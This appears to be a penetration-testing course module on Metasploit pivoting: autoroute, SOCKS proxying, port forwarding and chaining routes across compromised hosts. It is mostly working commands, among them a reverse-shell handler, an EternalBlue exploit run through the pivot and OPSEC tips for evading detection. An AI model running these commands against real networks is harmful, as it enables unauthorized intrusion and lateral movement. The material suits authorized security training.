Back to All Modules

Metasploit Routing and Forwarding

#Overview

Metasploit provides built-in routing and port forwarding through Meterpreter sessions. This is useful when you already have a Meterpreter session and don't want to upload additional tools to the pivot host.

#autoroute (Extended)

#Auto-Route from Session

# From Meterpreter prompt
meterpreter> run autoroute -s 172.16.0.0/24

# From msf console (specify session)
msf6 > use multi/manage/autoroute
msf6 exploit(multi/manage/autoroute) > set SESSION 1
msf6 exploit(multi/manage/autoroute) > set SUBNET 172.16.0.0/24
msf6 exploit(multi/manage/autoroute) > run

# Route multiple subnets
meterpreter> run autoroute -s 172.16.0.0/24
meterpreter> run autoroute -s 192.168.0.0/16
meterpreter> run autoroute -s 10.0.0.0/8
MSF

#View and Remove Routes

# List active routes
msf6 > route

# Remove a route
msf6 > route remove 172.16.0.0 255.255.255.0 1

# Remove all routes for a session
msf6 > route flush
MSF

#Manual Route Add

When autoroute doesn't work (e.g., you need to specify a different gateway), add routes manually.

# Basic route: subnet through session
msf6 > route add 172.16.0.0 255.255.255.0 1

# Single host route
msf6 > route add 172.16.0.10 255.255.255.255 1

# Route through specific session
msf6 > route add 192.168.0.0 255.255.0.0 2

# Verify routes
msf6 > route

# Output:
# Subnet          Netmask          Gateway
# ------          -------          -------
# 172.16.0.0      255.255.255.0    Session 1
# 192.168.0.0     255.255.0.0      Session 2
MSF

#SOCKS Proxy through Meterpreter

Set up a SOCKS proxy that routes traffic through the Meterpreter session. Other tools (nmap, curl, browser) can use this proxy.

# Step 1: Add route to target subnet
msf6 > route add 172.16.0.0 255.255.255.0 1

# Step 2: Start SOCKS proxy server
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set VERSION 5
msf6 auxiliary(server/socks_proxy) > run -j

# Step 3: Use with proxychains
# Edit /etc/proxychains4.conf:
# socks5 127.0.0.1 1080

proxychains4 nmap -sn 172.16.0.0/24
proxychains4 curl http://172.16.0.10/
MSF

#SOCKS4a vs SOCKS5

# SOCKS5 (default, recommended)
msf6 auxiliary(server/socks_proxy) > set VERSION 5

# SOCKS4a (for tools that don't support SOCKS5)
msf6 auxiliary(server/socks_proxy) > set VERSION 4a
MSF

#portfwd (Extended)

#Local Port Forward

# Forward local 8080 through Meterpreter to 172.16.0.10:80
meterpreter> portfwd add -l 8080 -p 80 -r 172.16.0.10

# Forward multiple ports
meterpreter> portfwd add -l 3306 -p 3306 -r 172.16.0.20
meterpreter> portfwd add -l 6379 -p 6379 -r 172.16.0.30

# List forwards
meterpreter> portfwd list

# Delete a forward
meterpreter> portfwd delete -l 8080
MSF

#Reverse Port Forward (-R)

# Reverse forward: bind port on the pivot host, forward back to attacker
meterpreter> portfwd add -R -l 8080 -p 4444 -r 127.0.0.1

# This binds port 8080 on the PIVOT host
# Traffic to pivot:8080 is forwarded to attacker:4444
# Useful for receiving reverse shells through the pivot
MSF

#Forward with Specific Local Bind

# Bind to specific local address (not just 127.0.0.1)
meterpreter> portfwd add -l 8080 -L 0.0.0.0 -p 80 -r 172.16.0.10
MSF

#Combining autoroute + SOCKS + Modules

The real power of Metasploit routing is combining it with other modules that automatically use the routes.

# Step 1: Get Meterpreter session
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.10.10
msf6 exploit(multi/handler) > run

# Step 2: Add route through the session
meterpreter> run autoroute -s 172.16.0.0/24
meterpreter> background

# Step 3: Scan the routed subnet (uses the route automatically)
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 172.16.0.0/24
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 22,80,445,3389
msf6 auxiliary(scanner/portscan/tcp) > run

# Step 4: Exploit through the route
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.16.0.20
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

# Step 5: Set up SOCKS for external tools
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
msf6 auxiliary(server/socks_proxy) > run -j

# Now use proxychains with external tools:
proxychains4 nmap -sT -Pn 172.16.0.0/24 -p 22,80,445
MSF

#Pivoting Through Multiple Sessions

# Session 1: Direct access to DMZ host
# Session 2: DMZ host exploited, access to internal host
# Session 3: Internal host exploited, access to core network

# Route DMZ subnet through session 1
msf6 > route add 10.10.0.0 255.255.255.0 1

# Route internal subnet through session 2
msf6 > route add 172.16.0.0 255.255.255.0 2

# Route core subnet through session 3
msf6 > route add 192.168.0.0 255.255.255.0 3

# Now Metasploit modules can reach all three subnets
# SOCKS proxy also routes through all sessions
MSF

#Common Pitfalls

  1. Session dies = route dies: If the Meterpreter session drops, all routes through it are lost. Consider upgrading to a more stable transport (reverse_https, bind_tcp).
  2. SOCKS proxy is slow: The Metasploit SOCKS proxy is significantly slower than Chisel or Ligolo-ng. Use it for scanning, not for large data transfers.
  3. portfwd TCP only: Meterpreter portfwd only supports TCP. Use autoroute + SOCKS for other protocols.
  4. autoroute needs active session: autoroute requires a live Meterpreter session. If you background the session and it dies, routing breaks.
  5. Route conflicts: Adding routes that overlap with existing routes can cause traffic to go through the wrong session.

#OPSEC Considerations

  • Metasploit routes are in-memory only — they disappear when msfconsole exits
  • The SOCKS proxy server is a listener that may be detected by port scanning
  • autoroute is silent on the pivot host — no new process is created
  • portfwd creates a thread inside the Meterpreter process — harder to detect than a new process
  • Use reverse_https Meterpreter for OPSEC-friendly C2 through the pivot

#Cross-References